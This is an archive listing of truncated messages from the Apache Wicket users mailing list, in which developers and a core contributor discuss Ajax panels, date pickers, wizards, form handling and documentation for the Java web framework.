<a href="/home">/home</a>, it produces a
UrlRequest value:
type UrlRequest = Internal Url.Url | External String
The
Internal variant is for any link that stays on the same domain. So if you are browsing, internal links include things like
settings#privacy,
/home,, and
//example.com/home.
The
External variant is for any link that goes to a different domain. Links like,, and all go to a different domain. Notice that changing the protocol from
https to
http is considered a different domain!
Whichever link someone presses, our example program is going to create a
LinkClicked message and send it to the
update function. That is where we see most of the interesting new code!
LinkClicked
Most of our
update logic is deciding what to do with these
UrlRequest values:
update : Msg -> Model -> ( Model, Cmd Msg ) update msg model = case msg of LinkClicked urlRequest -> case urlRequest of Browser.Internal url -> ( model, Nav.pushUrl model.key (Url.toString url) ) Browser.External href -> ( model, Nav.load href ) UrlChanged url -> ( { model | url = url } , Cmd.none )
The particularly interesting functions are
Nav.load and
Nav.pushUrl. These are both from the
Browser.Navigation module which is all about changing the URL in different ways. We are using the two most common functions from that module:
loadloads all new HTML. It is equivalent to typing the URL into the URL bar and pressing enter. So whatever is happening in your
Modelwill be thrown out, and a whole new page is loaded.
pushUrlchanges the URL, but does not load new HTML. Instead it triggers a
UrlChangedmessage that we handle ourselves! It also adds an entry to the “browser history” so things work normal when people press the
BACKor
FORWARDbuttons.
So looking back at the
update function, we can understand how it all fits together a bit better now. When the user clicks a link, we get an
External message and use
load to load new HTML from those servers. But when the user clicks a
/home link, we get an
Internal message and use
pushUrl to change the URL without loading new HTML!
Note 1: Both
Internaland
Externallinks are producing commands immediately in our example, but that is not required! When someone clicks an
Externallink, maybe you want to save textbox content to your database before navigating away. Or when someone clicks an
Internallink, maybe you want to use
getViewportto save the scroll position in case they navigate
BACKlater. That is all possible! It is a normal
updatefunction, and you can delay the navigation and do whatever you want.
Note 2: If you want to restore “what they were looking at” when they come
BACK, scroll position is not perfect. If they resize their browser or reorient their device, it could be off by quite a lot! So it is probably better to save “what they were looking at” instead. Maybe that means using
getViewportOfto figure out exactly what is on screen at the moment. The particulars depend on how your application works exactly, so I cannot give exact advice!
UrlChanged
There are a couple ways to get
UrlChanged messages. We just saw that
pushUrl produces them, but pressing the browser
BACK and
FORWARD buttons produce them as well. And like I was saying in the notes a second ago, when you get a
LinkClicked message, the
pushUrl command may not be given immediately.
So the nice thing about having a separate
UrlChanged message is that it does not matter how or when the URL changed. All you need to know is that it did!
We are just storing the new URL in our example here, but in a real web app, you need to parse the URL to figure out what content to show. That is what the next page is all about!
Note: I skipped talking about
Nav.Keyto try to focus on more important concepts. But I will explain here for those who are interested!
A navigation
Keyis needed to create navigation commands (like
pushUrl) that change the URL. You only get access to a
Keywhen you create your program with
Browser.application, guaranteeing that your program is equipped to detect these URL changes. If
Keyvalues were available in other kinds of programs, unsuspecting programmers would be sure to run into some annoying bugs and learn a bunch of techniques the hard way!
As a result of all that, we have a line in our
Modelfor our
Key. A relatively low price to pay to help everyone avoid an extremely subtle category of problems!
|
https://guide.elm-lang.org/webapps/navigation.html
|
CC-MAIN-2019-30
|
refinedweb
| 1,413
| 76.22
|
We are running Netscalar 10.1 and I have installed version 5.0 of 'Splunk for Citrix Netscaler ' and the 'Splunk Add-on for IPFIX' but so far I cannot see any information coming up in either the NetScaler Overview or AppFlow Overview areas. I am running Splunk on a linux box. I can see that data is arriving from the Netscaler. I would welcome any tips or instructions on what extra steps I need to take with indexes or data inputs..
we are are experimenting with the SplunkForNetscaler application.
It is important that you look at the python scripts which come with the app in /bin directory. These scripts define the source, source type, index which are expected. If you do NOT wish to have these preferences you will need to change the script.
/opt/splunk/etc/deployment-apps/SplunkforCitrixNetScaler/bin/scripted_inputs
def create_inputs(appdir, disabled):
localdir = os.path.join(appdir, 'local')
if not os.path.exists(localdir):
os.makedirs(localdir)
inputs_file = os.path.join(localdir, 'inputs.conf')
fo = open(inputs_file, 'w')
fo.write( "[udp://8514]\n")
fo.write( "#connection_host = dns\n")
fo.write( "sourcetype = ns_log\n")
fo.write( "index = netscaler\n")
fo.write( "disabled = %d\n" % disabled)
(PS I wish splunk had better support for Markdown like Github)
Hello everyone,
I'm having a very similar issue although for a period of time my AppFlow Dahboards within the app were populating successfully but have since stopped.
I'm seeing a very similar message in my logs and was looking to see if any resolution ever came from this thread?
10-07-2014 13:44:17.092 -0400 ERROR ExecProcessor - message from "python /splunk/etc/apps/Splunk_TA_ipfix/bin/ipfix.py" CRITICAL:ipfix:Traceback (most recent call last): || File "/splunk/etc/apps/Splunk_TA_ipfix/bin/splunklib/modularinput/script.py", line 74, in run_script || self.stream_events(self._input_definition, event_writer) || File "/splunk/etc/apps/Splunk_TA_ipfix/bin/IPFIX/ModInput.py", line 117, in stream_events || self.handle_message(data, address, stanza, writer) || File "/splunk/etc/apps/Splunk_TA_ipfix/bin/IPFIX/ModInput.py", line 77, in handle_message || source=":".join([str(v) for v in source]))) || File "/splunk/etc/apps/Splunk_TA_ipfix/bin/splunklib/modularinput/event_writer.py", line 104, in write_event || event.write_to(self._out) || File "/splunk/etc/apps/Splunk_TA_ipfix/bin/splunklib/modularinput/event.py", line 106, in write_to || stream.write(ET.tostring(event)) || File "/splunk/lib/python2.7/xml/etree/ElementTree.py", line 1126, in tostring || ElementTree(element).write(file, encoding, method=method) || File "/splunk/lib/python2.7/xml/etree/ElementTree.py", line 820, in write || serialize(write, self._root, encoding, qnames, namespaces) || File "/splunk/lib/python2.7/xml/etree/ElementTree.py", line 939, in _serialize_xml || _serialize_xml(write, e, encoding, qnames, None) || File "/splunk/lib/python2.7/xml/etree/ElementTree.py", line 937, in _serialize_xml || write(_escape_cdata(text, encoding)) || File "/splunk/lib/python2.7/xml/etree/ElementTree.py", line 1073, in _escape_cdata || return text.encode(encoding, "xmlcharrefreplace") || UnicodeDecodeError: 'utf8' codec can't decode byte 0xfa in position 206: invalid start byte
My inputs.conf for AppFlow is as follows:
[ipfix://NetScaler_AppFlow] sourcetype = appflow index = netscaler address = 0.0.0.0 port = 4739 buffer = 1048576 disabled = false
Thank you in advance - I'm going to continue to troubleshoot this from my end.
Try this search and let me know what you see:
index=* *netscaler* | stats count by index
Thanks Jconger.
I did what you asked and the search came back empty. I believe data is coming from the netscaler as it was working prior to upgrading Splunk for Citrix Netscaler. I can see that data is arriving on the Splunk box and netscaler is the only device Splunk is monitoring at the moment.
Hi Jconger
I had a breakthrough earlier and now have Splunk for Netscaler working. I still cannot see any appflow data so I am now trying to sort that out.
Nice. What index is the NetScaler data in?.
Hi Jbennett_splunk
Thanks for the reply. The netscaler configuration should be ok and it was working up until the point where I updated Splunk for Citrix Netscaler to the latest version. As far as I can tell the setting are exactly the same as in the example above. I am not sure what you mean by 'match where you are sending the data' so if you could elaborate that would be great.
If we are talking about the [ipfix://...] section of the inputs.conf file then I believe that is ok. I am a real newbie at this so I am unsure of how exactly one does a manual search.
To me it looks like Splunk is receiving data from the netscaler but not doing anything meaningful with it.
I am seeing the following error messages.
09-25-2014 16:12:23.590 +1000 ERROR SearchScheduler - Error in 'SearchOperator:copyresults': Cannot find results for search_id 'scheduler__nobody__SplunkforCitrixNetScaler__RMD5e6c1124fdfffb39d_at_1411625511_0'., search='copyresults dest="appid_lookup" sid="scheduler__nobody__SplunkforCitrixNetScaler__RMD5e6c1124fdfffb39d_at_1411625511_0"' 09-25-2014 16:11:57.614 +1000 ERROR ExecProcessor - message from "python /opt/splunk/etc/apps/Splunk_TA_ipfix/bin/ipfix.py" CRITICAL:ipfix:Traceback (most recent call last): || File "/opt/splunk/etc/apps/Splunk_TA_ipfix/bin/splunklib/modularinput/script.py", line 74, in run_script || self.stream_events(self._input_definition, event_writer) || File "/opt/splunk/etc/apps/Splunk_TA_ipfix/bin/IPFIX/ModInput.py", line 105, in stream_events || s.bind((bind_host, bind_port)) || File "/opt/splunk/lib/python2.7/socket.py", line 224, in meth || return getattr(self._sock,name)(*args) || error: [Errno 98] Address already in use
The first thing I would say is double-check that the address and port in your
[ipfix://...] stanza are correct (0.0.0.0 means it's listening on all local IP addresses, which is usually fine), and match where you're sending the data.
Also, of course, make sure you're forwarding both syslog and netflow (aka IPFIX) from the Netscaler 😉
The second thing would be to double-check the index and sourcetype settings in your
[ipfix://...] configuration, and do a manual search to see if there's any data in that index/sourcetype.
The app put the data in
index=netscaler which is not searched by default thus you need
index=netscaler in your search.
As well to collect the data you need to put the
Splunk_TA_Citrix-NetScaler folder in
SplunkforCitrixNetScaler/appserver/addons/ to your splunk data collection instance
SPLUNK_HOME\etc\apps\ and put it on your splunk search head too.
Your might need to either modify your netscaler config or the
SPLUNK_HOME\etc\apps\Splunk_TA_Citrix-NetScaler\default\inputs.conf ports:
[udp://8514] #connection_host = dns sourcetype = ns_log index = netscaler disabled = true # A separate IPFIX addon is needed in order for the following stanza to work. [ipfix://NetScaler_AppFlow] sourcetype = appflow index = netscaler address = 0.0.0.0 port = 4739 buffer = 1048576 disabled = true
Hi Mario
Thanks for replying. I have the above in my SPLUNK_HOME\etc\apps\Splunk_TA_Citrix-NetScaler\default\inputs.conf file already but it has made no difference. Could I please ask you to explain a little more about the 'index=netscaler' portion of your answer? I am unsure where to perform this action. Apologies for being a Splunk newbie. 🙂
to see if you have data you need to check if the index netscaler has been created in
/manager/launcher/data/indexes then search
/app/search/search?q=search index%3Dnetscaler | head 1000 to see if there is data/
Hi Mario
As far as I can tell I do not have that directory. I am running Splunk on Ubuntu Linux. I have searched on the linux box for that directory but have found nothing.
which directory do you mean? do you have an index named
netscaler in ?
|
https://community.splunk.com/t5/All-Apps-and-Add-ons/Configuration-of-Splunk-for-Citrix-NetScaler-App-with-AppFlow/m-p/136246
|
CC-MAIN-2021-17
|
refinedweb
| 1,254
| 60.21
|
Alex Navasardyan has announced the release of Ember.js 1.7 to the JavaScript community.
Navasardyan is an Ember.js release team member and described the release as bringing "bug fixes, potentially breaking changes and new features."
Among the new features in version 1.7 is support for query parameters. Giving thanks to Alex Matchneer and his core Ember.js team in the article "Ember 1.7.0 and 1.8 Beta Released", Navasardyan explains the feature, saying:
With this API, each query param is bound to a property on a controller, such that changes made to query params in the URL (e.g. user presses the back button) will update the controller property, and vice versa.
The API handles many of what Navasardyan describes as the "tricky aspects" of maintaining a binding to a URL.
These include correctly casting new URL query parameter values to the datatype expected by the controller property, omitting default query parameter values from the URL to avoid unnecessarily cluttering the URL with default values, and coalescing multiple controller property changes into one single URL update.
Other new features announced include nestable routes, removing the restriction that only
this.resource can have nested child routes. With this change, Navasardyan says,
this.routecan be nested like
this.resource, but unlike
this.resource, the namespace of child routes is appended rather than reset to a top-level namespace.
In the Ember.js discussion forum, user Jinshui Tang commented on advance notice of the query params release, saying it had "resolved one of the most important issues with the pagination of part of my application."
Praise for query parameters also came from Ember users on Twitter. EmberSherpa responded to Alex Matchneer's release announcement saying "thank you so much for QP. It’s the most exciting thing to hit Ember stable since 1.0."
According to the Ember.js 1.7.0 changelog the new release brought with it also a small number of breaking changes and deprecations, including On Controllers:
the content property is now derived from model. This reduces many caveats with model/content, and also sets a simple ground rule: Never set a controllers content, rather always set its model and Ember will do the right thing.
And for empty arrays:
An empty array is treated as falsy value in bind-attr to be in consistent with if helper. Breaking for apps that relies on the previous behaviour which treats an empty array as truthy value in bind-attr.
Among the listed bug fixes brought by the 1.7 Ember release were:
- Controllers with query params are unit testable.
- Controllers have new QP values before setupController.
- makeBoundHelper supports unquoted bound property options.
- SimpleHandlebarsView should not re-render if normalized value is unchanged. Allow Router DSL to nest routes via this.route.
with many more listed in the Ember.js 1.7.0 changelog here.
Already announced in the 1.8 Ember beta, the internal implementation of the view layer has been refactored, and for Internet Explorer 6 and 7 usage of Ember is deprecated, with support being removed in the next major release.
Ember.js is released via an MIT licence. InfoQ readers can contribute to Ember.js via its GitHub project
Community comments
|
https://www.infoq.com/news/2014/09/ember17/
|
CC-MAIN-2021-39
|
refinedweb
| 539
| 59.3
|
I am learning c++, below is an attempt at a simple XOR encryption program. I am am using Dev c++ (Blooodshed Ide) using the ming-gw win 32 gcc compiler blah blah.
This code compiles without errors or warnings but it will not produce an 'exe' only a '.o' file, firstly what is a '.o' file? Without much ado I am guessing its a type of report produced when the program contains run-time errors. I am unable to access it though :o(
secondly does anyone know how this code could run; without having to make too many extreme changes to it?
Thanks S
#include <string> #include <iostream> #include <fstream> #include <stdio.h> using namespace std; string textToEncrypt; string outString; int main(int argc, char* argv[]) { int key = 129; fstream infile1; infile1.open(argv[0],ios::in);//Open file infile1 >> textToEncrypt; { char c; int i; int j = textToEncrypt.length(); while (!infile1.eof( )) { for (int x=0;j-1;x++){ c = textToEncrypt[i]; c = (char)(c ^ key);//Encypt characters using v. simple XOR outString[x] = c; i++; } } } infile1.write((char*)&outString,sizeof(outString)); //Write encryption infile1.close(); return 0; }
|
https://www.daniweb.com/programming/software-development/threads/206249/very-simple-xor-encryption
|
CC-MAIN-2018-05
|
refinedweb
| 188
| 67.25
|
I am not a native English speaker, and I am not heading for the Pulitzer Prize of Journalism. So, if anyone fine this “article” a bit short, get patient. My purpose here is to provide the most useful information with not too much talking. Besides, my C# English is fine enough for the VS2005 compiler :-). I hope the readers of this article will get their answer to the subject they Googled for: "Handling HTML events in .NET".
I was looking for a way to handle HTML events with the .NET
EventHandler. While writing my Password Management Toolbar, I needed a way to hook to the “
onsubmit” event of the HTML document form in order to check the login information.
Anyway, I looked for forums and threads that would give me a straight answer, but didn’t find any. So, that left me no choice but to go to the last resort: the Reflector (Luts Roeder’s .NET Reflector).
What did I look for? When working with the
WebBrowser control, you get the
HtmlElement wrapper class that allows you to bind to mouse events pretty easily (like the
HtmlElement.Click event). But, I do not work with the
WebBrowser control,
BandObject (this is the toolbar object), or the Browser Helper Object (BHO) which only have access to the MSHTML DOM elements. Also, the managed wrapper do not provide an event for “
onsubmit”, so even the
WebBrowser control wouldn’t do for me. So, I started digging with the Reflector to see what the guys in Microsoft did to allow binding to mouse events. The main thing that I found was the
HtmlToClrEventProxy class which provided the correct interface for the object needed by the
IHTMLElement2.attachEvent method. Anyway, this class is internal, so I took most of it, refined it, and made a similar public version of it that allows .NET users to easily attach to any
HTMLElement event.
The best way is to download and try the sample first. There is only one class you need to add to your project, this is the
HtmlEventProxy class. This class have a factory method
Create() which will do all the binding. Then, when you want to detach from the event, simply call the
Detach() method of the object. The “
sender” object in the
EventHandler is the proxy itself. In order to get the underlying
HTMLElement, use the
HtmlElement property. Here are a few of the code snippets from the sample:
Let's start from the .NET event handler of the
onsubmit form event. It has the regular signature of the
EventHandler. The code here also extracts the form element from the sender and shows its
outerHTML string.
I chose to detach from the event once it is consumed, using the
Detach() method.
private void FormSubmitHabdler(object sender, EventArgs e) { MessageBox.Show("form submitted"); // show the outer html of the form IHTMLElement form = ((HtmlEventProxy)sender).HTMLElement as IHTMLElement; MessageBox.Show("outer html:" + form.outerHTML); //detach the event from the element ((HtmlEventProxy)sender).Detach(); }
Now, for the code that binds the form
onsubmit event to the handler:
object form = webBrowser1.Document.Forms[0].DomElement ; HtmlEventProxy.Create("onsubmit", form, FormSubmitHabdler); object button = webBrowser1.Document.GetElementById("button1").DomElement; HtmlEventProxy.Create("onclick", button, ButtonClickHabdler);
First, obtain the element object from the document. Then, create a proxy with the name of the event, the DOM element, and the .NET handler.
The class implements the
IReflect interface; that is the interface that is needed by
IHTMLElement2.attachEvent(string ev,object pDisp). The most important is the implementation of the
IReflect.InvokeMember method. This method detects the call to the first method entry and executes the .NET handler.
I also implemented the
IDisposable interface, so the event is detached when the proxy is disposed.
public class HtmlEventProxy : IDisposable,IReflect { // Fields private EventHandler eventHandler; private object sender; private IReflect typeIReflectImplementation; private IHTMLElement2 htmlElement = null; private string eventName = null; // private CTOR private HtmlEventProxy(string eventName, IHTMLElement2 htmlElement, EventHandler eventHandler) { this.eventName = eventName; this.htmlElement = htmlElement; this.sender = this; this.eventHandler = eventHandler; Type type = typeof(HtmlEventProxy); this.typeIReflectImplementation = type; } public static HtmlEventProxy Create(string eventName, object htmlElement, EventHandler eventHandler) { IHTMLElement2 elem = (IHTMLElement2)htmlElement; HtmlEventProxy newProxy = new HtmlEventProxy(eventName,elem, eventHandler); elem.attachEvent(eventName, newProxy); return newProxy; } /// detach only once (thread safe) /// public void Detach() { lock (this) { if (this.htmlElement != null) { IHTMLElement2 elem = (IHTMLElement2)htmlElement; elem.detachEvent(this.eventName, this); this.htmlElement = null; } } } /// HtmlElemet property /// public IHTMLElement2 HTMLElement { get { return this.htmlElement; } } #region IReflect ...... object IReflect.InvokeMember(string name,BindingFlags invokeAttr, Binder binder, object target, object[] args, ParameterModifier[] modifiers, CultureInfo culture, string[] namedParameters) { if (name == "[DISPID=0]") { if (this.eventHandler != null) { this.eventHandler(this.sender, EventArgs.Empty); } } return null; } #endregion }
You can download the latest version of HtmlEventProxy.cs from here.
Enjoy!
General
News
Question
Answer
Joke
Rant
Admin
|
http://www.codeproject.com/KB/dotnet/NetHtmlEventHandler.aspx
|
crawl-002
|
refinedweb
| 795
| 50.02
|
Re: Basic Program to Import a CSV file
- From: "Tom deL" <ted@xxxxxxxxxxxxxx>
- Date: 8 Jun 2006 08:39:01 -0700
Hi Tony,
LOL. Now that you mention it, I'll admit it was silly for me to
assume that a CSV file came from Excel. But I think it's really funny
to imply that someone should buy a completely different database
product to import a text file into Universe.
Funnier than importing into a completely foreign system in order to
export through your filter of choice? Please note the resisted
temptation to reference the old "If the only tool with which one is
familiar is a hammer ..." cliche.
Given that the OP asked about importing a CSV file into UV, what would
it matter where the CSV file originated? And why would someone require
some Excel to MV tool to import a CSV file into UV? Looks like a case
of "my tool is the answer - what is the question?".
My suggestion was that if one were to bring an external application
into the equation, one which contains tools with which a MV person
would have facility might be more accessable (openQM vs. Excel as an
import filter).
- if you really want/need to use a
spread*** application as a filter OOCalc is more capable
Hey, why stop at replacing the database, replace the spread*** tools
too! Does that solve the CSV problem? No, but it sure sounds like a
plan!
And your Excel "solution" solved the CSV problem how? Why would you
assume that one would be replacing the spread*** tools? FYI, not
everyone owns a copy of Excel. Hammers, nails et. al. I guess?
and infinitely less expensive
Seems a bit overly zealous, no? A standalone package of Excel 2003
can be purchased for about $170. That's hardly a large sum of money
for software that some companies run their businesses on (no advocacy
of that practice implied), and hardly an amount to be associated with
the terms "infinite" or "expensive".
Aside from "Divide by Zero Error" how would you describe the difference
between $US 170.00 and $US 0.00? And I didn't mention that OO.org comes
with all of the applications to handle .doc; .ppt and so on but that's
probably OT here.
but:
If your CSV file is RFC compliant or even if "all fields are wrapped in
quotes", openQM has the ability to directly parse your file into either
a hashed MV file or a directory file. The directory file may well be UV
compatible but if not you could easily do a T-DUMP and simply T-LOAD
into UV.
Sounds like a Rube Goldberg to me.
Using MV tools to do a job in MV is Rube Goldberg and installing (and
learning) foreign software isn't? The fact that you are so tied to
Excel, .NET and so on does not imply that the OP or any other MV user
would be.
An openQM license is vaguely equivalent to the cost of an Excel license
Did you forget the point you just made that Excel may not be involved?
I was attempting an apples to apples comparison: if we are going to use
a third party bit (sigh, see above).
and there is no need to import into Excel; export as another delimited
format or install anyone's adware and the required transport layer
license.
Hmmmm ... come to think of it, you could even replace UV with openQM
and then wouldn't require any of those third party bits and their
complication - might make more sense than a mediocre spread***
application or "free" adware as filters.
-Tom
What the hell are you going on about?
- There are no ads in my freeware.
No they come whether one downloads it or not <g>
- The freeware I suggested to export worksheets to CSV does not have a
transport layer into MV, and neither does anything you suggested to
replace it.
- No one said anything about importing into Excel or exporting in any
other format.
As I mentioned above, you were the one who introduced Excel into this
thread - without Excel, what sense would your "freeware" make in the
context of the OP?
- You compare QM to my freeware as though they do the same thing. QM
has no Excel interface and doesn't write into other MV databases.
It does however have a proper CSV interface. And with a bit of
imagination one should be able to see that openQM can write to other
(modern at least) MV databases. For instance, I have no difficulty
using openQM's RFC compliant CSV parsing capabilities to write a
directory file that I can attach directly in D3 by simply creating a
Q-Pointer. AFAIK all modern MV environments contain this capability.
You're trying to make some kind of argument that X is better than Y
when the two concepts aren't even related.
No more related than your suggestion that your Excel export program is
somehow germane to an import CSV question?
- Haven't you lost some perspective about exactly what it is that
you're fighting for when someone already has data and a database and
you propose replacing everything they have just so they can do some
text manipulation?
Sorry about the redundancy and spoon-feeding but: See above. The
suggestion to replace the database was an afterthought. See below.
Tom, I don't understand why you feel a need to persist with innuendo
and flat out lies when you reply to my postings. This doesn't help
Tony, I have gone out of my way to honour your request to keep personal
shortcomings out of these discussions. You should at least stand ready
to reciprocate or be big enough to back up your projections with facts.
anyone here. Like anyone else here, I provide free info and some free
software. I do what I can toward the common good. When someone wants
something special that saves them time, improves their life, or allows
them to make more money, I offer to sell my solutions. There's
nothing evil about that but it seems you get bent when I offer to sell
These are your words. Is your inference of "evil" what you reference
above as innuendo? My post was simply meant to offer a solution that
could actually bear upon the OP's request.
solutions. Maybe some hatred for Microsoft drives your responses. I
really have no idea what your motivations are but I wish you'd get it
out in the open.
See immediately above. Does your love for M$ drive you to suggest
"solutions" that have no bearing on the problem posed in the OP?
What's really a shame is when week after week we see people hunting
for the same solutions, expecting to find them for free, solutions
that have been available (perhaps for years) for a very low and
reasonable cost. How much time=money is spent in the quest for all
things free? How much time=money would be saved if people just took a
look at some of the for-fee solutions that I offer whenever they ask
for help. How much money might some developer have earned in the last
year if only they would have adopted and sold a for-fee solution,
rather than waiting an entire year with no related income for some
free magic bullet? How do you help these people when you try to
undermine my efforts to provide solutions - even the free ones?
Below:
Here it is "out in the open" <g>:
People hunting for the same solutions is precisely the reason for my
afterthought suggestion of replacing the database tools.
In openQM, Ladybridge has provided a huge number of these solutions -
incorporated within the database and its tools, doing away with the
need for Rube Goldberg add-ons and the incessent re-inventing of the
wheel.
Most of these "things that should have been available years ago" are
often in and of themselves quite low-key: efficiently implemented in a
very PICK-like way so they sort of blend into the scenery. This is good
for those using the system.
collection of tools has some difficulty competing with the bellicosecollection of tools has some difficulty competing with the bellicoseFrom a marketing point of view this large, very efficient and useful
hype associated with some vendors here. My goal is to point out those
quiet features when they make sense.
TYM,
-Tom
.
- Follow-Ups:
- Re: Basic Program to Import a CSV file
- From: rcamarda
- References:
- Basic Program to Import a CSV file
- From: Wytevette
- Re: Basic Program to Import a CSV file
- From: Tom deL
- Prev by Date: Re: Basic Program to Import a CSV file
- Next by Date: Re: require select
- Previous by thread: Re: Basic Program to Import a CSV file
- Next by thread: Re: Basic Program to Import a CSV file
- Index(es):
|
http://newsgroups.derkeiler.com/Archive/Comp/comp.databases.pick/2006-06/msg00071.html
|
crawl-002
|
refinedweb
| 1,493
| 69.01
|
Re: replace panels with fade effect
On 7/28/07, Leszek Gawron [EMAIL PROTECTED] wrote: I'd like to create an ajax heavy application (no pages, all panels). When replacing panels during ajax event I would like the old panel to fade out and new one to fade in (or any kind of morph effect). I've been trying to make use of
Re: general question on dynamic pages
With regard to the Login/Welcome example, I have a problem with the Login's page's mutator methods being called in the onClick() in the Welcome page. Your scenario requires that Welcome know too much about Login. If Welcome and Login depend on the same model, and Welcome changes the model,
Re: Behaviour adding to Component body
On 7/30/07, Jan Kriesten [EMAIL PROTECTED] wrote: Hi Eelco, You can use onRendered and write directly to the response using Response response = component.getResponse(); not really. I tried that before, But that only writes the param after the close tag which isn't what is intended. :-)
Re: Behaviour adding to Component body
On 7/30/07, Martijn Dashorst [EMAIL PROTECTED] wrote: Yep, I was wondering why not create your own ShockWaveComponent that exposes the parameters using some API, and renders them using a repeating view? Yeah, you could do that as well. Though directly writing them out in onComponentTagBody
Re: Behaviour adding to Component body
since I haven't overridden onComponentTagBody yet - what happens to child-Tags then, do I have to manage these, too? If that's an issue, it's better to follow Martijn's advice and make this component a panel with a list view for the parameters. Eelco
Re: Behaviour adding to Component body
I thought I could just concentrate on the last aspect and apply only the needed changes... (i.e. move an attribute to a param name...). You should be able to pull that off if you use AbstractTransformerBehavior. Btw, if you ever get to it, a nice Flash component with a demo for
Re: Behaviour adding to Component body
yes, tried that already. strangely, object gets an additional xmlns:wicket=?! but it doesn't seem to hurt. Yeah, that happens in onComponentTag: public void onComponentTag(final Component component, final ComponentTag tag) {
Re: Menu???
Any extension or work being done to create a javascript based menu in Wicket? I know in the old nabble there was discussion but that was over a year ago. Nope. I guess it doesn't itch enough for us, and we didn't get any contributions in the mean time that I know off. If I'd had some more
Re: Resizing Table Columns Like Yahoo Mail
Or an advanced one That's sweet! Eelco - To unsubscribe, e-mail: [EMAIL PROTECTED] For additional commands, e-mail: [EMAIL PROTECTED]
Re: NullPointerException when clicking on an expired wizard button
I was running some random tests to try to see what kind of trouble a typical user of my app could cause. After completing a wizard, clicking the browser's back button, then clicking the previous button of the wizard, I get the error below. Is there a more graceful way to handle this rather
Re: mountBookmarkablePage and missing parameters - exception thrown
On 8/5/07, Igor Vaynberg [EMAIL PROTECTED] wrote: mount with indexed url coding strategy if you dont mind users messing with your urls. I think it's kind of annoying as well. Are we (Wicket devs) really against supporting this, or don't we support it because the code gets a bit hairy? Eelco
Re: How to use form method=get?
I've tried extending Form and adding tag.put(method, get) in onComponentTag(..), but this doesn't work either. The page gets rendered as with form method=get but submits won't work. Is this possible achieve? It looks like you can override method 'getMethod' in your form and let it return get.
Re: NullPointerException when clicking on an expired wizard button
On 8/6/07, David Leangen [EMAIL PROTECTED] wrote: After completing a wizard, clicking the browser's back button, then clicking the previous button of the wizard, I get the error below. Looks like a bug. Are you using 1.2.6? Yes. Unfortunately, I'm still stuck on 1.2.6+ for the
Re: {wicket 1.3 Beta 2} Adding panel via ajax...
On 8/7/07, Nino Saturnino Martinez Vazquez Wael [EMAIL PROTECTED] wrote: Ok, I'll try to explain myself a little better. Im using the tabs from extensions, tabs require that what you work with are panels (otherwise I would have done this with pages). So some of my tabs have a certain flow.
Re: BBcode component?
On 8/7/07, Nino Saturnino Martinez Vazquez Wael [EMAIL PROTECTED] wrote: Hi I was wondering if any one had done a bbcode component for wicket that they would share? Not that I know of. But I would be surprised if no-one every did this before with Wicket :) Im needing something that will do
Re: [Newbie] Add a yui calendar without a datetextfield
On 8/8/07, Igor Vaynberg [EMAIL PROTECTED] wrote: i used to use the code below, but now i see eelco has removed AbstractCalendar :( Sorry. I put it back. The problem is that it isn't maintained well, as all the effort so far has been around the date picker. And since the datepicker is a
Re: [Newbie] Add a yui calendar without a datetextfield
On 8/8/07, Gerolf Seitz [EMAIL PROTECTED] wrote: i was looking for AbstractCalendar too... hm, maybe we could use this as an opportunity to provide an all around YUI Calendar integration with features like a standalone calendar, multiple calendars, calendars that open when a specific event
Re: wicketstuff-dojo questions and answers
I'm getting the feeling this list doesn't have a ton of patience for questions it considers dumb. I think it's more a matter of us being incredibly busy :) Eelco - To unsubscribe, e-mail: [EMAIL PROTECTED] For additional
Re: wicketstuff-dojo questions and answers
Q. a. Why isn't this stuff documented in more depth? b. And why don't people answer every stupid little question I have. A. a. Wicketstuff-Dojo is still a fairly young project with people who are currently more into coding it for more functionality than documenting. You're certainly welcome
Re: [Newbie] Add a yui calendar without a datetextfield
On 8/8/07, Igor Vaynberg [EMAIL PROTECTED] wrote: can you not factor out the common thing into an abstract behavior and have abstractcalendar add that abstract behavior to itself and bridge config methods through itself? Possibly. Core of the matter is that we should get rid of the code
Re: Compare JSP Vs Wicket?
Please send me all your suggestions. including the below question In jsp, I can pass the values using query string for eg. form action=actionJSP.jsp?userName=edipassword=edi using request.getParameter(userName); I can get the userName. using request.getParameter(password); I can get the
Re: Reacting to DateField change
On 8/9/07, Federico Fanton [EMAIL PROTECTED] wrote: On Thu, 9 Aug 2007 16:00:24 +0100 Dipu Seminlal [EMAIL PROTECTED] wrote: i just tried with the date picker on 1.2.6 and it works, don't know if anything has changed drastically in 1.3 In 1.3 DatePicker was replaced with DateField, they
Re: Reacting to DateField change
Ok, thanks anyway :) So.. Markup modification isn't needed, but if I'm not mistaken attaching the behavior directly to the DateField doesn't yield what I'm looking for..? Nope. That is because the DateField itself is a panel, while you need to attach it to the text field it embeds. In your
Re: Authentication in Webapp and Wicket documentation...
honestly spoken, this is not the best strategy for everyone... Obviously. But we have limited resources (no-one is paid for working on Wicket), so it is hard to cater to everyone. We have tried to attract writers (for a reference guide) from the very early start (even offered some money) but it
Re: Authentication in Webapp and Wicket documentation...
No, actually I was not aware of that, was waiting for the Wicket in Action book... You can get the first chapters now. Two more chapters will be released early next week. maybe one should also start writing some proper articles as a starting point; I might do
Re: shopping cart and back button
I have a user case like this: 1. User opens products page. 2. User chooses a product. 3. User clicks add product to shopping cart. 4. User is redirected to shopping cart list. 5. User clicks _back button in the browser_. 6. Added product in step 3 disappear from the shopping cart :( So is
Re: RequestDispather.forward()
Would the fact that wicket now uses a filter instead of a servlet have an effect on trying to forward a request. I'm trying to forward a request from the jsp/servlet portion of our app to a bookmarkable wicket page using RequestDispatcher.forward(), but no matter what sort of path I send it,
warning: API break FormComponent#checkRequired and FormComponentPanel
All, Please read and and check whether this effects you. I didn't have time to look at the wicket-stuff projects, but if you are extending FormComponentPanel, you'll have to implement checkRequired
Re: Empty CSS
IResourceSettings.setDisableGZipCompression() is not available in the version of Wicket that I'm using (1.2.6). We didn't provide compression of resources in Wicket, so it's correct that setting doesn't exist. Eelco - To
nuke the sourceforge lists!
Hey Martijn, others, Can we go ahead and remove all users from the sourceforge lists and make sure no-one can every subscribe again? Or is there a better way? Eelco - To unsubscribe, e-mail: [EMAIL PROTECTED] For additional
Re: Import Validation using wicket
I saw that example, But I am not able to understand fully. Pls explain. When you do: new TextField(foo, model, Integer.class); then Wicket will check that input can safely be converted to an integer. With the current version of Wicket, you don't even need to provide the Integer argument if
Re: Ideas for a Wicket Based Cms
two extra points: *) think about bookmarkability/ nice URLs. *) try to make the user-facing side (so the result of what people did with the CMS/ anything that can be accessed without logging in) stateless if you can. Eelco On 8/14/07, Eelco Hillenius [EMAIL PROTECTED] wrote: 1) It will use
